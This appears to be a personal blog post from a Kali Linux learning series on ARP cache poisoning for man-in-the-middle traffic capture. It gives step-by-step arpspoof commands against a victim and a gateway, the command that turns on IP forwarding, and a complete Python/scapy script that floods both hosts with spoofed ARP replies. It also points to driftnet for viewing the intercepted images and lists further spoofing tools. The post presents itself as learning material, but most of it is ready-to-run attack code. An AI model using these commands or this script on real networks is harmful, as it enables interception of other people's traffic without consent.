<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>Penetration Testing : 流量捕获之APR缓存攻击 | 欢迎参观小灰灰的网站哟 ヾ(◍°∇°◍)ﾉﾞ ~ | It&#39;s founded on March 9, 2019 and the open source address for the blog notes https://github.com/YUbuntu0109/YUbuntu0109.github.io</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="Penetration Testing,Kali Linux,Python">
    <meta name="description" content="intro12345# author: huangyuhui# date: november 25,2019# envir: 5.2.0-kali2# desc: the detailed steps and the simple codes about the dns attack# repo address: https://github.com/yubuntu0109/penetration">
<meta name="keywords" content="Penetration Testing,Kali Linux,Python">
<meta property="og:type" content="article">
<meta property="og:title" content="Penetration Testing : 流量捕获之APR缓存攻击">
<meta property="og:url" content="https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/index.html">
<meta property="og:site_name" content="欢迎参观小灰灰的网站哟 ヾ(◍°∇°◍)ﾉﾞ ~">
<meta property="og:description" content="intro12345# author: huangyuhui# date: november 25,2019# envir: 5.2.0-kali2# desc: the detailed steps and the simple codes about the dns attack# repo address: https://github.com/yubuntu0109/penetration">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/penetration-testing_moments_arp-spoofing.png">
<meta property="og:updated_time" content="2020-03-31T12:36:02.545Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Penetration Testing : 流量捕获之APR缓存攻击">
<meta name="twitter:description" content="intro12345# author: huangyuhui# date: november 25,2019# envir: 5.2.0-kali2# desc: the detailed steps and the simple codes about the dns attack# repo address: https://github.com/yubuntu0109/penetration">
<meta name="twitter:image" content="https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/penetration-testing_moments_arp-spoofing.png">
    
        <link rel="alternate" type="application/atom+xml" title="欢迎参观小灰灰的网站哟 ヾ(◍°∇°◍)ﾉﾞ ~" href="/atom.xml">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

</head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/my-portrait.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">黄宇辉</h5>
          <a href="mailto:3083968068@qq.com" title="3083968068@qq.com" class="mail">3083968068@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                Homepage
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives"  >
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/tags"  >
                <i class="icon icon-lg icon-tags"></i>
                Tags
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/categories"  >
                <i class="icon icon-lg icon-th-list"></i>
                Categories
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/YUbuntu0109" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://space.bilibili.com/364361791" target="_blank" >
                <i class="icon icon-lg icon-link"></i>
                Bilibili
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">Penetration Testing : 流量捕获之APR缓存攻击</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="Search">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
        <!-- add the background music on Mar 11,2019
        <div>
            <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=280 height=52 src="//music.163.com/outchain/player?type=2&id=438801642&auto=1&height=32"></iframe>
        </div>
        -->
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">Penetration Testing : 流量捕获之APR缓存攻击</h1>
        <h5 class="subtitle">
            
                <time datetime="2019-11-25T22:24:22.000Z" itemprop="datePublished" class="page-time">
  2019-11-25
</time>


            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#intro"><span class="post-toc-number">1.</span> <span class="post-toc-text">intro</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#ARP-MitM-attack-with-the-tool-of-arpspoof"><span class="post-toc-number">2.</span> <span class="post-toc-text">ARP MitM attack with the tool of arpspoof</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#ARP-Man-in-the-middle-attack-with-python"><span class="post-toc-number">3.</span> <span class="post-toc-text">ARP Man-in-the-middle attack with python</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#moments"><span class="post-toc-number">4.</span> <span class="post-toc-text">moments</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#recommended-tools"><span class="post-toc-number">5.</span> <span class="post-toc-text">recommended tools</span></a></li></ol>
        </nav>
    </aside>


<article id="post-Penetration-Testing-流量捕获之APR缓存攻击"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">Penetration Testing : 流量捕获之APR缓存攻击</h1>
        <div class="post-meta">
            <time class="post-time" title="2019-11-25 22:24:22" datetime="2019-11-25T22:24:22.000Z"  itemprop="datePublished">2019-11-25</time>

            


            

        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h3 id="intro"><a href="#intro" class="headerlink" title="intro"></a>intro</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># author: huangyuhui</span></span><br><span class="line"><span class="comment"># date: november 25,2019</span></span><br><span class="line"><span class="comment"># envir: 5.2.0-kali2</span></span><br><span class="line"><span class="comment"># desc: the detailed steps and the simple codes about the dns attack</span></span><br><span class="line"><span class="comment"># repo address: https://github.com/yubuntu0109/penetration-testing-learning</span></span><br></pre></td></tr></table></figure>
<h3 id="ARP-MitM-attack-with-the-tool-of-arpspoof"><a href="#ARP-MitM-attack-with-the-tool-of-arpspoof" class="headerlink" title="ARP MitM attack with the tool of arpspoof"></a>ARP MitM attack with the tool of arpspoof</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">&gt;&gt; scan the targete ip</span></span><br><span class="line"><span class="string">nmap -sP 192.168.xxx.*</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&gt;&gt; spoofing the target host: disguised as the gateway,the real identity is attacker</span></span><br><span class="line"><span class="string">arpspoof -i wlan0 -t 192.168.xxx.xxx(targetIP) 192.168.xxx.xxx(gateway)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&gt;&gt; spoofing the gateway: disguised as the targetIP, the real identity is attacker</span></span><br><span class="line"><span class="string">arpspoof -i wlan0 -t 192.168.xxx.xxx(gatewayIP) 192.168.xxx.xxx(targetIP)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&gt;&gt; traffic forwarding: forward the data package to the gateway</span></span><br><span class="line"><span class="string">echo 1 &gt;/proc/sys/net/ipv4/ip_forward</span></span><br><span class="line"><span class="string">'''</span></span><br></pre></td></tr></table></figure>
<h3 id="ARP-Man-in-the-middle-attack-with-python"><a href="#ARP-Man-in-the-middle-attack-with-python" class="headerlink" title="ARP Man-in-the-middle attack with python"></a>ARP Man-in-the-middle attack with python</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> optparse</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">from</span> scapy.all <span class="keyword">import</span> sendp, ARP, Ether</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line">	<span class="string">''' init the parameters '''</span></span><br><span class="line">	parser = optparse.OptionParser(<span class="string">"usage: %prog -v &lt;victimIP&gt; -g &lt;gatewayIP&gt;"</span>)</span><br><span class="line">	parser.add_option(<span class="string">'-v'</span>, dest=<span class="string">'victimIP'</span>, type=<span class="string">'string'</span>, help=<span class="string">'the specified targate ip'</span>)</span><br><span class="line">	parser.add_option(<span class="string">'-g'</span>, dest=<span class="string">'gatewayIP'</span>, type=<span class="string">'string'</span>, help=<span class="string">'the specified gateway ip'</span>)</span><br><span class="line">	(options, args) = parser.parse_args()</span><br><span class="line">	<span class="keyword">if</span> (options.victimIP == <span class="literal">None</span>) | (options.gatewayIP == <span class="literal">None</span>):</span><br><span class="line">		<span class="keyword">print</span> parser.usage</span><br><span class="line">		exit(<span class="number">0</span>)</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		victimIP = options.victimIP</span><br><span class="line">		gatewayIP = options.gatewayIP</span><br><span class="line"></span><br><span class="line">	<span class="string">''' MitM attack '''</span></span><br><span class="line">	<span class="keyword">try</span>:</span><br><span class="line">		attackGateway = Ether()/ARP(psrc=victimIP, pdst=gatewayIP)</span><br><span class="line">		attackTarget = Ether()/ARP(psrc=gatewayIP, pdst=victimIP)</span><br><span class="line">		<span class="keyword">print</span> <span class="string">'[ok]:MitM attack is running'</span></span><br><span class="line">		sendp(attackGateway, inter=<span class="number">1</span>, loop=<span class="number">1</span>)  <span class="comment"># send the data package to the target host circularly</span></span><br><span class="line">		sendp(attackTarget, inter=<span class="number">1</span>, loop=<span class="number">1</span>)  <span class="comment"># send the data package to the gateway circularly</span></span><br><span class="line">	<span class="keyword">except</span>:  <span class="comment"># except optparser.TypeError as e:</span></span><br><span class="line">		<span class="keyword">pass</span>  <span class="comment"># print 'error:please enter the correct parameters'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># traffic forwarding</span></span><br><span class="line">n = subprocess.call(<span class="string">'echo 1 &gt;&gt; /proc/sys/net/ipv4/ip_forward'</span>, shell=<span class="literal">True</span>)</span><br><span class="line">print((<span class="string">"[x]:the traffic forwarding hasn't opened"</span>,<span class="string">"[ok]:the traffic forwarding has opened"</span>)[n==<span class="number">0</span>])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># run: python arpspoofing.py -v &lt;victim ip&gt; -g &lt;gateway ip&gt;</span></span><br><span class="line"><span class="comment"># test: see the effects by the tool of driftnet : driftnet -v -b -i wlan0(interface name)</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">	main()</span><br></pre></td></tr></table></figure>
<h3 id="moments"><a href="#moments" class="headerlink" title="moments"></a>moments</h3><p><em>😅 a simple arp spoofing~</em></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/penetration-testing_moments_arp-spoofing.png" alt title>
                </div>
                <div class="image-caption"></div>
            </figure>
<h3 id="recommended-tools"><a href="#recommended-tools" class="headerlink" title="recommended tools"></a>recommended tools</h3><ul>
<li>kickthemout : <a href="https://github.com/k4m4/kickthemout" target="_blank" rel="noopener">https://github.com/k4m4/kickthemout</a></li>
<li>arpspoof : <a href="https://github.com/byt3bl33d3r/arpspoof" target="_blank" rel="noopener">https://github.com/byt3bl33d3r/arpspoof</a></li>
<li>Python ARP Poisoner : <a href="https://github.com/Sha2ow-M4st3r/PAPoisoner" target="_blank" rel="noopener">https://github.com/Sha2ow-M4st3r/PAPoisoner</a></li>
</ul>

        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    Last updated: <time datetime="2020-03-31T12:36:02.545Z" itemprop="dateUpdated">2020-03-31 12:36:02</time>
</span><br>


        
    </div>
    
    <footer>
        <a href="https://yubuntu0109.github.io">
            <img src="/img/my-portrait.jpg" alt="黄宇辉">
            黄宇辉
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            
	<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Kali-Linux/">Kali Linux</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Penetration-Testing/">Penetration Testing</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Python/">Python</a></li></ul>


            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/&title=《Penetration Testing : 流量捕获之APR缓存攻击》 — 欢迎参观小灰灰的网站哟 ヾ(◍°∇°◍)ﾉﾞ ~&pic=https://yubuntu0109.github.io/img/my-portrait.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/&title=《Penetration Testing : 流量捕获之APR缓存攻击》 — 欢迎参观小灰灰的网站哟 ヾ(◍°∇°◍)ﾉﾞ ~&source=My Personal Website For Blog" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《Penetration Testing : 流量捕获之APR缓存攻击》 — 欢迎参观小灰灰的网站哟 ヾ(◍°∇°◍)ﾉﾞ ~&url=https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/&via=https://yubuntu0109.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2019/11/25/Penetration-Testing-流量捕获之DNS缓存攻击/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">Penetration Testing : 流量捕获之DNS缓存攻击</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2019/11/22/Penetration-Testing-物理攻击之samdump2与chntpw/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">Penetration Testing : 物理攻击之samdump2与chntpw</h4>
      </a>
    </div>
  
</nav>



    




















</article>

<div id="reward" class="page-modal reward-lay">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <h3 class="reward-title">
        <i class="icon icon-quote-left"></i>
        thanks ~
        <i class="icon icon-quote-right"></i>
    </h3>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/img/Wechat_appreciates.png" alt="打赏二维码">
        </div>
        
    </div>
</div>



</div>

        <footer class="footer">
    <div class="top">
        

        <p>
            
                <span><a href="/atom.xml" target="_blank" class="rss" title="rss"><i class="icon icon-lg icon-rss"></i></a></span>
            
            <span>This blog is licensed under a <a rel="license" href="https://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>.</span>
        </p>
    </div>
    <div class="bottom">
        <!-- 统计网站用户访问量. 技术支持：不蒜子(http://busuanzi.ibruce.info/) ————> Mar 13,2019 -->
        <p>
            <font style='font-size: 12px;color:springgreen'>
                    <div align="center">
                        <!-- 安装脚本 -->
                        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
                        <!-- 安装标签 -->
                        <span id="busuanzi_container_site_pv">
                            ◎用户总访问量 : <span id="busuanzi_value_site_pv"></span> 次 ~ &nbsp&nbsp
                        </span>
                        <span id="busuanzi_container_site_uv">
                            ◎总访客数(（づ￣3￣）づ╭❤～) : <span id="busuanzi_value_site_uv"></span>人 ~
                        </span>
                    </div>
                </font>
            </p>
            <!---------->
            <p>
                <font style='font-size: 10px'>
                    <span>黄宇辉 &copy; 2019 - 2020</span>
                    <span>
                        
                        Blog source <a href="https://github.com/YUbuntu0109/YUbuntu0109.github.io" target="_blank">Github</a> 
                        Power by <a href="http://hexo.io/" target="_blank">Hexo</a>
                        Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
                    </span>
                </font>
            </p>
        </div>
    </footer>
    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/&title=《Penetration Testing : 流量捕获之APR缓存攻击》 — 欢迎参观小灰灰的网站哟 ヾ(◍°∇°◍)ﾉﾞ ~&pic=https://yubuntu0109.github.io/img/my-portrait.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/&title=《Penetration Testing : 流量捕获之APR缓存攻击》 — 欢迎参观小灰灰的网站哟 ヾ(◍°∇°◍)ﾉﾞ ~&source=My Personal Website For Blog" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《Penetration Testing : 流量捕获之APR缓存攻击》 — 欢迎参观小灰灰的网站哟 ヾ(◍°∇°◍)ﾉﾞ ~&url=https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/&via=https://yubuntu0109.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=https://yubuntu0109.github.io/2019/11/25/Penetration-Testing-流量捕获之APR缓存攻击/" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>








<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = 'Where are you going ?';
            clearTimeout(titleTime);
        } else {
            document.title = 'As long as you love me ~';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



</body>
</html>
